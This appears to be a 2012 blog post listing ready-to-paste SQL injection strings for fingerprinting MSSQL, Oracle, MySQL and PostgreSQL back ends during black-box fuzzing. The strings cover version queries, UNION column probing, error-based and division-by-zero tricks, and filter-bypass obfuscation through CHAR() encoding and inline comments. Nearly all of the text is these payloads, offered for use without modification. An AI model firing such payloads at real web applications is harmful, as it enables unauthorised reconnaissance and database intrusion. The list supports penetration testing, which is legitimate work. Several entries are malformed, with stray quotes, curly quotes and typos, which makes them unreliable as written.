10/03/2012

Database Finger Printing


SQL Fuzzing

This article is created to introduce an SQL query injection reference, meanning strings that can be used without any modification (a simple copy paste) in web application SQL fuzzers to perform balck box SQL fuzzing (no assumption made about back end database). In the following table M means MSSQL, O means Oracle, P means Postgre and My means MySQL.

SQL Injection Strings For Fingerprinting
'SELECT @@version --MNote: This injection query works with any instance of SQL Server 2000 or of a later version.
' UNION SELECT @@version,NULL,NULL--MNote: This injection query can be used to identify amount of table columns, data types and database version.
'SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY ('productlevel'), SERVERPROPERTY ('edition') --MNote: This query works with any instance of SQL Server 2000 or of a later version.
The following results are returned:
  • The product version (for example, 10.0.1600.22)
  • The product level (for example, RTM)
  • The edition (for example, Enterprise)
'1 in (SELECT @@version) --MNote: This query works with by trying to generate encapsulated casting errors.
'1 in (CHAR(83) + CHAR(69) + CHAR(76) + CHAR(69) + CHAR(67) + CHAR(84) + CHAR(32) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110)) --MNote: This query is using obfuscation technices to by pass SQL filters and is not going to work in most cases.
'SELECT/*Place what ever you want*/ @@version --MNote:This is good for by passing filters in bad SQL filters.
' 1 in (SELECT/*Place what ever you want*/ @@version) --MNote: Again this is good for by passing filters in bad SQL filters.
' or @@PACK_RECEIVED-@@PACK_RECEIVED --MNote:The @@PACK_RECEIVED databse system variable is used to display a report containing several SQL Server statistics, including packets sent and received. Used in the injection point with numerical values.
Injectable'+'Variable --MNote:Usage of string concatenation used by MSSQL database
'SELECT version FROM v$instance;ONote:You can capture the edition, version and release (32 bit or 64-bit)
'SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;ONote:You can capture the edition, version and release in both 32 bit or 64-bit versions
'SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;ONote:You can capture the edition, version and release in both 32 bit or 64-bit versions.SELECT statements must have a FROM clause in Oracle
'Injection'||'variable' --ONote:Usage of string concatenation used by Oracle database. When injecting the vulnerable variable the web application should behave normaly.
SELECT banner FROM v$version WHERE banner LIKE "Oracle Database%";ONote:You can capture the edition, version and release in both 32 bit or 64-bit versions.SELECT statements must have a FROM clause in Oracle. 
SELECT @@version #MyNote: Again a version injection query
'Injection' 'variable' #MyNote: Again a verion injection query (notice the space of the string).
'SELECT /*!32302 12*/ #MyNote: This injection string is used for string values (char variables) and should return the number 12. You will get the same response if MySQL version is higher than 3.23.02 .
or /*!32302 12*/ = /*!32302 12*/MyNote: This injection string is used for numerical values and is equal to or 1=1 in MSSQL. You will get the same response if MySQL version is higher than 3.23.02 .
' or /*!32302 12*/ = /*!32302 12*/ #MyNote: This injection string is used for numerical values and is equal to or ' or 1=1 -- in MSSQL. You will get the same response if MySQL version is higher than 3.23.02 .
SELECT /*What ever you want to inject*/@@version#MyNote:Again used to by passing SQL data filters.
CONNECTION_ID()-CONNECTION_ID()#MyNote:Again for versioning database in numerical injections.
' SELECT /*!32302 1/0, */ 1/1 FROM existingtablename # MyNote:Will throw an divison by 0 error if MySQL version is higher than 3.23.02.
' SELECT /*!32302 1/1, */ 1/0 FROM existingtablename #MyNote:Will throw an divison by 0 error if MySQL version is lower than 3.23.02.
SELECT version()-PNote:Check the comment character.